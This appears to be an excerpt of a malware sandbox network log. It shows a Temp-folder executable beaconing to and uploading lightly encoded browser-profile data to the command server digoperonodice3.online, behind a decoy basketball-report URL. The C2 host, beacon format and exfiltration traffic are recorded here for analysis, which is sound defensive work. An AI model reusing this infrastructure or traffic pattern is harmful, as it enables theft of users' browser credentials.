2024-12-27 07:15:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49714	172.67.153.243	443	1296	C:\Users\user\AppData\Local\Temp\Localdockerv3.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 07:15:57 UTC	484	OUT	POST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1E Content-Length: 208 Host: digoperonodice3.online
2024-12-27 07:15:57 UTC	208	OUT	Data Raw: 00 00 00 00 fd ff ff ff 03 00 00 00 00 00 00 00 92 00 01 08 00 00 00 3d 81 4c 29 95 00 00 00 28 00 00 00 04 04 04 04 39 85 48 2d 07 04 04 04 04 04 04 04 96 c4 94 04 04 04 04 39 85 48 2d 66 04 04 04 04 04 04 04 54 4f 02 02 28 04 04 04 04 04 04 04 29 04 29 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 54 4f 02 03 04 04 04 04 04 04 04 04 04 04 04 04 05 04 04 04 54 4f 01 02 04 04 04 04 fb fb fb fb fb fb fb fb fb fb fb fb 04 04 fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb a0 1b 48 24 9c ee 94 49 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: =L)(9H-9H-fTO())TOTOH$I
2024-12-27 07:15:58 UTC	854	IN	HTTP/1.1 204 No Content Date: Fri, 27 Dec 2024 07:15:57 GMT Connection: close catid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1E cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QucK1frha4wW%2BuHhtklpWfddUr9n5hoPWUj1TYIlmjMwg90FoISz7prEi5vl%2F8Oz%2FY5k5QihlqqgNpLQmWUydHF8SvY3cWGMEWrtoiWUyOHeO8J64LwYrDwPan0hdzhVESq8ryi7AALX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8785bd7a1b7c96-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1878&min_rtt=1848&rtt_var=715&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2856&recv_bytes=1328&delivery_rate=1580086&cwnd=173&unsent_bytes=0&cid=eaba6c621f5e7bfe&ts=702&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49716	172.67.153.243	443	1296	C:\Users\user\AppData\Local\Temp\Localdockerv3.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 07:16:05 UTC	487	OUT	POST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1E Content-Length: 681886 Host: digoperonodice3.online
2024-12-27 07:16:05 UTC	15331	OUT	Data Raw: 00 00 00 00 fd ff ff ff 03 00 00 00 00 00 00 00 92 00 01 08 00 00 00 fc d6 cc 26 e2 11 0a 00 28 00 00 00 04 04 04 04 f8 d2 c8 22 04 07 04 04 04 04 04 04 97 c4 94 96 9c c4 94 a2 47 6c 76 6b 69 61 dd 31 47 3e 58 51 77 61 76 77 58 6c 71 66 61 76 70 58 45 74 74 40 65 70 65 58 48 6b 67 65 68 58 43 6b 6b 63 68 61 58 47 6c 76 6b 69 61 58 51 77 61 76 24 40 65 70 65 95 9d c4 94 a3 40 61 62 65 71 68 70 dd 39 47 3e 58 51 77 61 76 77 58 6c 71 66 61 76 70 58 45 74 74 40 65 70 65 58 48 6b 67 65 68 58 43 6b 6b 63 68 61 58 47 6c 76 6b 69 61 58 51 77 61 76 24 40 65 70 65 58 40 61 62 65 71 68 70 dd 30 67 6c 76 6b 69 6d 71 69 5b 66 76 6b 73 77 61 76 77 58 47 6c 76 6b 69 61 58 74 76 6b 62 6d 68 61 77 58 40 61 62 65 71 68 70 58 48 6b 63 6d 6a 24 40 65 70 65 dd 35 67 6c 76 6b Data Ascii: &("Glvkia1G>XQwavwXlqfavpXEtt@epeXHkgehXCkkchaXGlvkiaXQwav$@epe@abeqhp9G>XQwavwXlqfavpXEtt@epeXHkgehXCkkchaXGlvkiaXQwav$@epeX@abeqhp0glvkimqi[fvkswavwXGlvkiaXtvkbmhawX@abeqhpXHkcmj$@epe5glvk
2024-12-27 07:16:05 UTC	15331	OUT	Data Raw: 74 33 51 74 41 6a 4a 69 4b 47 71 5d 4b 7d 67 75 46 76 4e 4f 2f 69 43 73 5e 5e 54 73 4b 30 3c 30 61 77 43 52 49 65 2f 40 34 37 45 34 37 4e 55 72 4b 7c 51 4d 69 46 65 52 4c 76 4f 66 66 5d 46 36 51 6e 6c 42 43 46 62 66 43 34 4e 4c 45 37 6e 63 63 4f 76 45 37 45 51 69 4b 55 73 6b 71 30 43 65 7e 46 3d 7c 7e 71 77 2b 3c 31 4c 69 34 4d 2b 66 61 4c 70 57 70 30 49 6b 57 72 55 73 62 4b 7e 4e 31 2f 4f 57 4f 62 57 56 3d 70 5d 69 7e 40 30 65 52 70 35 36 4f 68 52 65 61 3c 47 70 70 52 4b 49 4d 41 52 55 32 4c 75 76 77 56 7e 31 6c 2b 67 52 6e 7d 66 42 5d 4b 43 2f 57 55 68 36 46 67 4c 30 4a 36 4b 57 7d 4c 43 69 35 30 53 6c 37 74 6a 49 45 4f 66 73 7d 74 74 33 7e 74 34 6d 68 53 33 63 3d 52 4d 47 49 37 30 35 35 6d 43 48 32 71 63 31 56 50 54 2b 66 4d 5d 76 74 53 6e 70 41 60 47 Data Ascii: t3QtAjJiKGq]K}guFvNO/iCs^^TsK0<0awCRIe/@47E47NUrK\|QMiFeRLvOff]F6QnlBCFbfC4NLE7nccOvE7EQiKUskq0Ce~F=\|~qw+<1Li4M+faLpWp0IkWrUsbK~N1/OWObWV=p]i~@0eRp56OhRea<GppRKIMARU2LuvwV~1l+gRn}fB]KC/WUh6FgL0J6KW}LCi50Sl7tjIEOfs}tt3~t4mhS3c=RMGI7055mCH2qc1VPT+fM]vtSnpA`G
2024-12-27 07:16:05 UTC	15331	OUT	Data Raw: 67 3d 6b 4e 55 6d 30 32 5e 35 32 37 55 42 66 4c 41 56 4f 6c 6b 67 6c 56 6b 55 42 3d 3d 71 55 3d 55 3c 4d 32 4c 4f 30 50 56 33 4f 48 50 40 7d 7d 50 37 31 61 37 63 7d 71 4b 43 6c 6c 48 72 50 69 72 53 6b 6b 32 7e 34 51 54 46 4b 3c 46 32 72 3c 37 3d 42 4e 33 30 42 75 3d 37 41 51 49 4e 41 6d 6c 46 63 6b 3c 7d 47 4c 4e 46 63 6b 3c 7c 47 54 4e 46 63 76 77 5e 46 4d 51 63 73 50 34 49 63 69 4f 55 30 4b 49 49 63 77 41 63 73 57 67 5d 46 4f 51 63 73 57 67 5e 46 41 4a 46 63 6f 2f 31 46 40 72 46 6c 6b 32 6d 49 6f 43 4f 61 35 6f 51 68 47 33 72 5d 35 42 55 7d 72 73 34 6d 30 48 57 31 72 34 77 47 6f 75 60 40 33 45 6b 4f 4c 35 2f 6c 6f 52 46 4f 62 57 72 53 56 57 51 56 6e 2b 48 6b 75 46 51 2f 6e 6f 53 46 65 5c 50 7e 7e 49 6b 42 41 75 6a 5c 36 46 56 51 40 76 3d 4d 6b 71 47 34 Data Ascii: g=kNUm02^527UBfLAVOlkglVkUB==qU=U<M2LO0PV3OHP@}}P71a7c}qKCllHrPirSkk2~4QTFK<F2r<7=BN30Bu=7AQINAmlFck<}GLNFck<\|GTNFcvw^FMQcsP4IciOU0KIIcwAcsWg]FOQcsWg^FAJFco/1F@rFlk2mIoCOa5oQhG3r]5BU}rs4m0HW1r4wGou`@3EkOL5/loRFObWrSVWQVn+HkuFQ/noSFe\P~~IkBAuj\6FVQ@v=MkqG4
2024-12-27 07:16:05 UTC	15331	OUT	Data Raw: 7c 67 42 3c 68 46 66 51 32 71 53 5e 55 57 5e 75 45 76 3d 57 74 67 2f 43 47 4c 4c 4c 57 74 54 55 61 53 31 75 54 35 41 45 48 53 37 6a 6c 71 2b 51 46 69 6b 3d 30 75 30 3c 77 4f 77 36 47 76 66 3d 47 31 5c 4d 49 35 7d 3c 51 74 63 72 62 67 30 76 46 61 75 4d 30 5d 65 76 65 34 5c 4f 70 69 56 4d 68 37 63 32 72 4c 62 56 32 6a 6b 66 6f 35 69 52 73 61 6a 5e 7d 67 56 5e 6f 2b 37 36 62 51 6d 30 4f 6e 55 50 30 71 51 40 69 71 61 51 63 76 3d 68 42 7c 4c 4b 4b 33 77 47 43 30 67 3d 69 70 6d 7e 6f 6c 36 50 65 7d 54 6c 66 77 69 31 77 5d 50 33 2f 4b 7c 70 2b 4f 77 35 67 74 7c 57 46 67 2f 72 5e 5c 77 5d 71 56 45 4b 4f 6f 36 75 34 74 48 76 6f 54 7c 62 46 49 31 65 46 50 54 2b 41 75 50 41 5d 7e 5c 32 33 6d 6d 72 45 65 41 6f 54 3d 6a 7d 46 32 37 43 4b 41 30 47 32 74 34 75 7e 45 46 Data Ascii: \|gB<hFfQ2qS^UW^uEv=Wtg/CGLLLWtTUaS1uT5AEHS7jlq+QFik=0u0<wOw6Gvf=G1\MI5}<Qtcrbg0vFauM0]eve4\OpiVMh7c2rLbV2jkfo5iRsaj^}gV^o+76bQm0OnUP0qQ@iqaQcv=hB\|LKK3wGC0g=ipm~ol6Pe}Tlfwi1w]P3/K\|p+Ow5gt\|WFg/r^\w]qVEKOo6u4tHvoT\|bFI1eFPT+AuPA]~\23mmrEeAoT=j}F27CKA0G2t4u~EF
2024-12-27 07:16:05 UTC	15331	OUT	Data Raw: 36 46 71 33 2f 6e 5d 71 76 49 63 5d 43 5c 66 71 5d 52 6c 7c 2f 3c 6c 4b 2f 37 65 43 42 57 33 55 67 43 77 4c 63 7d 32 52 33 7d 4b 33 42 6b 73 68 2b 55 5c 60 53 48 51 5c 4d 75 6a 75 76 76 31 35 2b 4a 4d 6e 6c 42 45 54 49 5e 35 68 32 72 6d 6d 48 4b 45 42 75 4c 7e 6d 50 4d 7e 3d 55 2b 35 5e 6c 4b 72 2b 30 62 74 2b 71 54 30 62 76 72 2f 4c 32 2b 2b 6c 2f 6a 2f 30 2b 6c 2f 71 2b 30 62 76 2b 2f 4c 32 62 33 6e 2f 4c 32 33 2b 6c 2f 72 2b 30 62 74 2b 71 54 30 62 76 72 2f 4c 32 2b 2b 6c 2f 6a 2f 30 2b 6c 2f 71 2b 30 62 76 2b 2f 4c 32 62 33 6e 2f 72 73 6a 53 2b 73 70 77 2b 60 3d 73 4d 57 70 3c 7c 34 33 7d 43 42 30 73 45 4f 5c 55 4c 6b 46 4f 4c 74 72 50 42 4f 6f 7c 68 6c 6b 7e 4e 6b 32 42 57 43 6f 5c 36 67 32 3c 33 57 5e 50 73 31 43 56 60 37 33 73 35 2f 35 46 4d 63 50 Data Ascii: 6Fq3/n]qvIc]C\fq]Rl\|/<lK/7eCBW3UgCwLc}2R3}K3Bksh+U\`SHQ\Mujuvv15+JMnlBETI^5h2rmmHKEBuL~mPM~=U+5^lKr+0bt+qT0bvr/L2++l/j/0+l/q+0bv+/L2b3n/L23+l/r+0bt+qT0bvr/L2++l/j/0+l/q+0bv+/L2b3n/rsjS+spw+`=sMWp<\|43}CB0sEO\ULkFOLtrPBOo\|hlk~Nk2BWCo\6g2<3W^Ps1CV`73s5/5FMcP
2024-12-27 07:16:05 UTC	15331	OUT	Data Raw: 62 45 56 7c 49 36 46 49 67 6e 40 2f 60 42 49 50 6d 4f 6f 33 6a 47 5e 5c 2b 77 6f 40 49 3c 6b 70 42 6b 6f 7d 6b 69 47 41 76 6d 55 32 31 7e 51 51 4a 69 2b 66 40 30 6b 56 4e 4c 43 36 7e 6b 54 65 6e 46 60 6e 48 49 37 66 32 55 4d 56 68 41 6d 77 3d 4f 4b 4c 65 41 50 32 66 67 67 6d 54 30 50 74 67 66 41 57 4b 37 37 4d 56 73 7d 6d 4e 4b 4c 4e 7c 63 41 74 3d 41 6d 6b 52 75 45 65 2b 4d 42 5e 4e 5d 72 5d 6b 36 6a 36 75 4a 43 56 51 2b 6a 37 41 4a 57 3c 53 6e 5d 6b 42 43 63 34 50 40 30 6d 71 74 36 43 4c 7c 47 6a 3c 54 6a 72 53 48 71 6f 62 6c 46 71 2b 47 68 37 4a 60 4b 46 4b 43 43 2f 7e 46 6c 7c 33 4b 6c 34 45 4f 63 76 33 63 6e 5e 53 50 74 70 35 3c 66 69 49 52 41 60 47 4a 52 67 6e 4f 66 65 7c 6c 72 48 4f 55 70 37 31 4d 36 6e 68 4e 55 6f 7e 63 33 66 53 67 55 31 4b 65 40 Data Ascii: bEV\|I6FIgn@/`BIPmOo3jG^\+wo@I<kpBko}kiGAvmU21~QQJi+f@0kVNLC6~kTenF`nHI7f2UMVhAmw=OKLeAP2fggmT0PtgfAWK77MVs}mNKLN\|cAt=AmkRuEe+MB^N]r]k6j6uJCVQ+j7AJW<Sn]kBCc4P@0mqt6CL\|Gj<TjrSHqoblFq+Gh7J`KFKCC/~Fl\|3Kl4EOcv3cn^SPtp5<fiIRA`GJRgnOfe\|lrHOUp71M6nhNUo~c3fSgU1Ke@
2024-12-27 07:16:05 UTC	15331	OUT	Data Raw: 49 63 52 4c 74 4a 3c 49 61 67 34 66 35 72 69 48 41 63 6d 6b 4f 63 42 57 55 55 46 66 34 41 57 63 7d 56 4c 4d 6d 36 32 61 6e 43 70 41 60 77 45 46 4c 67 34 69 32 47 60 57 36 30 67 47 68 57 3d 56 4f 6c 7d 54 47 6b 36 4e 75 6d 57 6d 35 7d 6c 69 74 77 6b 52 4a 45 5e 56 71 57 40 6d 7c 52 71 54 7e 40 6f 69 67 4a 31 4c 5c 7c 46 66 52 37 56 67 4f 5e 77 56 51 49 6e 47 2f 3c 4c 65 48 45 70 3d 7d 63 32 32 72 4e 5c 46 33 70 3c 37 68 4b 70 56 4b 42 30 3d 68 60 46 4f 75 67 45 6b 62 6b 68 47 74 56 5c 72 34 56 56 6d 70 51 72 67 60 6c 7d 49 69 7c 2b 50 4e 4c 6b 52 6a 6b 7c 56 53 4f 6f 41 5d 63 74 41 6b 3c 76 4e 3c 47 70 4c 34 4f 40 6c 4b 74 6f 57 2f 63 71 63 65 32 62 52 52 66 50 4b 47 7d 3d 65 36 70 6b 62 48 34 4b 6e 50 4c 33 55 49 34 54 47 5c 66 60 2f 4b 69 34 62 34 60 41 Data Ascii: IcRLtJ<Iag4f5riHAcmkOcBWUUFf4AWc}VLMm62anCpA`wEFLg4i2G`W60gGhW=VOl}TGk6NumWm5}litwkRJE^VqW@m\|RqT~@oigJ1L\\|FfR7VgO^wVQInG/<LeHEp=}c22rN\F3p<7hKpVKB0=h`FOugEkbkhGtV\r4VVmpQrg`l}Ii\|+PNLkRjk\|VSOoA]ctAk<vN<GpL4O@lKtoW/cqce2bRRfPKG}=e6pkbH4KnPL3UI4TG\f`/Ki4b4`A
2024-12-27 07:16:05 UTC	15331	OUT	Data Raw: 72 30 72 6a 46 4b 6f 43 53 46 31 51 71 75 3d 66 4e 31 54 76 76 5e 4b 60 75 6e 67 36 55 7c 40 69 50 6e 40 37 36 55 65 73 72 32 61 31 5d 31 68 4a 6e 49 47 60 61 31 7d 31 37 36 6a 5c 48 7e 7d 48 6c 77 69 56 6c 72 55 67 36 31 54 67 36 4c 31 71 3d 48 6b 5d 2f 37 71 56 56 41 51 57 42 51 6a 51 71 6d 5c 75 4f 4a 70 48 41 49 3c 4a 72 60 48 77 6d 3d 5e 2b 36 61 62 76 61 4c 7c 2f 71 6c 3d 65 36 5d 31 4c 6f 66 54 31 5c 63 40 62 37 7c 2b 7c 62 67 50 37 69 3c 6e 37 76 36 51 61 32 47 52 6d 77 74 68 49 30 66 69 5e 6a 55 62 2f 35 2b 49 72 7c 50 5e 42 69 5d 3c 7d 49 7e 3d 63 31 6a 7e 41 7e 46 41 7e 66 7d 4d 7e 2b 3d 69 34 31 2b 42 6b 6e 31 6a 62 3c 70 32 5c 5d 6c 43 6a 56 5e 7d 36 6d 5e 73 36 75 70 65 41 63 52 76 66 43 50 42 66 7c 43 7d 66 7c 36 7e 3d 30 47 73 2f 30 6f 43 Data Ascii: r0rjFKoCSF1Qqu=fN1Tvv^K`ung6U\|@iPn@76Uesr2a1]1hJnIG`a1}176j\H~}HlwiVlrUg61Tg6L1q=Hk]/7qVVAQWBQjQqm\uOJpHAI<Jr`Hwm=^+6abvaL\|/ql=e6]1LofT1\c@b7\|+\|bgP7i<n7v6Qa2GRmwthI0fi^jUb/5+Ir\|P^Bi]<}I~=c1j~A~FA~f}M~+=i41+Bkn1jb<p2\]lCjV^}6m^s6upeAcRvfCPBf\|C}f\|6~=0Gs/0oC
2024-12-27 07:16:05 UTC	15331	OUT	Data Raw: 55 62 71 47 4a 66 4f 48 45 5c 55 5c 2f 4b 49 4d 42 6d 4e 60 6c 62 6c 56 30 75 4f 6b 49 34 56 52 57 69 45 53 6d 4a 68 34 73 40 40 4b 62 4d 3c 30 49 36 56 52 46 55 4e 61 40 47 5d 5e 53 7e 7d 63 6d 70 4f 57 6f 5e 60 45 55 54 6d 6b 32 65 50 6a 41 57 4d 6c 70 61 5c 63 72 69 46 65 32 63 76 70 31 46 4a 30 6d 62 40 61 30 56 75 6f 67 35 46 70 30 45 67 74 50 51 67 45 37 49 4a 73 47 5d 6a 66 4d 6a 69 41 4d 49 6c 55 33 66 4f 49 43 46 47 6d 74 4c 4e 41 42 4b 43 5e 63 65 6a 6e 75 49 68 43 4a 67 42 71 63 45 6e 53 7d 66 67 49 46 5c 37 6f 52 2b 47 32 69 67 6e 6f 4e 6a 63 35 34 50 46 65 46 4d 52 7c 2b 69 43 46 60 35 75 46 67 77 4e 7c 67 54 63 49 48 6b 74 42 52 45 6b 3c 31 77 6c 51 43 53 73 5c 5c 40 3d 5d 43 50 76 4b 41 7d 45 41 53 55 30 53 48 45 6d 77 43 4b 34 70 30 50 51 Data Ascii: UbqGJfOHE\U\/KIMBmN`lblV0uOkI4VRWiESmJh4s@@KbM<0I6VRFUNa@G]^S~}cmpOWo^`EUTmk2ePjAWMlpa\criFe2cvp1FJ0mb@a0Vuog5Fp0EgtPQgE7IJsG]jfMjiAMIlU3fOICFGmtLNABKC^cejnuIhCJgBqcEnS}fgIF\7oR+G2ignoNjc54PFeFMR\|+iCF`5uFgwN\|gTcIHktBREk<1wlQCSs\\@=]CPvKA}EASU0SHEmwCK4p0PQ
2024-12-27 07:16:05 UTC	15331	OUT	Data Raw: 3d 32 2f 2f 49 75 50 45 5e 32 67 71 5c 40 4e 68 66 77 70 70 5c 5e 54 6c 6b 41 72 48 5c 49 54 4e 6e 49 69 40 45 36 4f 37 76 4b 55 45 61 69 74 34 61 31 49 4c 4d 72 6d 77 45 75 50 77 53 5e 6c 35 68 2b 30 7d 37 75 54 71 47 36 37 53 36 35 32 57 7c 60 63 7e 6a 62 4b 40 4a 2f 7c 75 6e 2b 61 32 4f 3c 62 43 53 32 41 50 60 7d 63 54 46 7e 5e 4a 60 72 40 33 74 6b 7c 54 52 36 4a 2b 51 7e 50 52 4d 36 41 2b 51 7e 6e 6e 4c 4c 6c 2f 4e 41 6e 33 75 54 49 57 68 48 35 6f 60 5d 5e 30 37 6e 77 63 6d 41 7e 71 54 55 52 54 45 5d 34 5d 55 53 54 56 5e 61 2f 63 6c 62 46 42 33 4b 47 7c 3c 47 51 33 3c 66 77 4e 52 74 69 7c 33 40 41 56 52 36 4f 7c 72 68 72 6a 7c 6f 53 45 6e 7d 7c 62 4b 50 7c 49 34 32 31 36 42 74 74 6f 37 6b 55 31 72 54 57 33 68 33 4d 53 72 76 60 4f 54 75 60 3c 62 67 4c Data Ascii: =2//IuPE^2gq\@Nhfwpp\^TlkArH\ITNnIi@E6O7vKUEait4a1ILMrmwEuPwS^l5h+0}7uTqG67S652W\|`c~jbK@J/\|un+a2O<bCS2AP`}cTF~^J`r@3tk\|TR6J+Q~PRM6A+Q~nnLLl/NAn3uTIWhH5o`]^07nwcmA~qTURTE]4]USTV^a/clbFB3KG\|<GQ3<fwNRti\|3@AVR6O\|rhrj\|oSEn}\|bKP\|I4216Btto7kU1rTW3h3MSrv`OTu`<bgL
2024-12-27 07:16:07 UTC	869	IN	HTTP/1.1 204 No Content Date: Fri, 27 Dec 2024 07:16:07 GMT Connection: close catid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1E cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xrhc1Qv4rKZRvcDGAR9QJ5%2FLwMbmmWfp65xNnrmwBqcgkY4IqDyPzersFHnKWhf7DJo8dEF8HHwnnMSbEdoCdJCYjqTxNIUJA%2FLdN9tXiwBEPZ5%2F%2B%2Bza1Pz3qV2xc%2B8pWu%2FVa6rw1eha"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8785ee8c010f6c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1671&min_rtt=1667&rtt_var=634&sent=410&recv=712&lost=0&retrans=0&sent_bytes=2855&recv_bytes=684945&delivery_rate=1713615&cwnd=180&unsent_bytes=0&cid=a0b6188009f1f577&ts=2054&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49717	172.67.153.243	443	1296	C:\Users\user\AppData\Local\Temp\Localdockerv3.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 07:16:08 UTC	484	OUT	POST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1E Content-Length: 745 Host: digoperonodice3.online
2024-12-27 07:16:08 UTC	745	OUT	Data Raw: 00 00 00 00 fd ff ff ff 03 00 00 00 00 00 00 00 92 00 01 08 00 00 00 79 80 76 0f 95 00 00 00 28 00 00 00 04 04 04 04 7d 84 72 0b 07 04 04 04 04 04 04 04 96 c4 94 04 04 04 04 7d 84 72 0b 66 04 04 04 04 04 04 04 54 4f 02 02 28 04 04 04 04 04 04 04 29 04 29 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 54 4f 02 03 04 04 04 04 04 04 04 04 04 04 04 04 05 04 04 04 54 4f 01 02 04 04 04 04 fb fb fb fb fb fb fb fb fb fb fb fb 04 04 fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb a0 1b 48 24 9c ee 94 49 08 00 00 00 f9 8c 55 2b a7 00 00 00 28 00 00 00 04 04 04 04 fd 88 51 2f 11 04 04 04 04 04 04 04 96 c4 96 91 c4 06 05 a7 96 c4 04 a4 91 c4 05 05 a7 96 c4 04 a4 04 04 04 04 fd 88 51 2f 66 04 Data Ascii: yv(}r}rfTO())TOTOH$IU+(Q/Q/f
2024-12-27 07:16:09 UTC	863	IN	HTTP/1.1 204 No Content Date: Fri, 27 Dec 2024 07:16:09 GMT Connection: close catid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1E cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XHRxJglVp%2FA5n1H%2FBOoQcZpVu%2FyvKmUDQrESaQeJ5B3JHWU1K9sqlJ0DfKVr3eZ7Rdq%2FHwExpSJ11vWAsm0520gtHSqN7Sn8SaHVN6Wnd21OFXB%2BO3sU3mIrKpURl59190IdJJWmC%2Bsd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f878604689a0f91-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=54881&min_rtt=1668&rtt_var=32165&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2856&recv_bytes=1865&delivery_rate=1750599&cwnd=218&unsent_bytes=0&cid=cbeb23130d444cb1&ts=805&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49718	172.67.153.243	443	1296	C:\Users\user\AppData\Local\Temp\Localdockerv3.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 07:16:10 UTC	484	OUT	POST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1E Content-Length: 212 Host: digoperonodice3.online
2024-12-27 07:16:10 UTC	212	OUT	Data Raw: 00 00 00 00 fd ff ff ff 03 00 00 00 00 00 00 00 92 00 01 08 00 00 00 d9 ce f9 3c 99 00 00 00 28 00 00 00 04 04 04 04 dd ca fd 38 03 04 04 04 04 04 04 04 97 c4 c4 96 c4 95 04 04 04 04 04 dd ca fd 38 66 04 04 04 04 04 04 04 54 4f 02 02 28 04 04 04 04 04 04 04 29 04 29 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 54 4f 02 03 04 04 04 04 04 04 04 04 04 04 04 04 05 04 04 04 54 4f 01 02 04 04 04 04 fb fb fb fb fb fb fb fb fb fb fb fb 04 04 fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb a0 1b 48 24 9c ee 94 49 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: <(88fTO())TOTOH$I
2024-12-27 07:16:11 UTC	852	IN	HTTP/1.1 204 No Content Date: Fri, 27 Dec 2024 07:16:11 GMT Connection: close catid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1E cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jAbgIqZEGmUmnO9S8ILqnSueQaPJabZYM2n8qr702%2BuhXCWd1aIwKehrdaqzPGifVmuDDy1rjWj%2B1UGZg8cG9fxewpGrYhrPQVPW7Fbd1tdlhsAmCIMqcyJWFD8XdOj2cz98l1mCsPUd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8786117a5c80cd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1680&min_rtt=1671&rtt_var=645&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2856&recv_bytes=1332&delivery_rate=1673352&cwnd=178&unsent_bytes=0&cid=456e478332079c78&ts=623&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49719	172.67.153.243	443	1296	C:\Users\user\AppData\Local\Temp\Localdockerv3.exe

Timestamp	Bytes transferred	Direction	Data
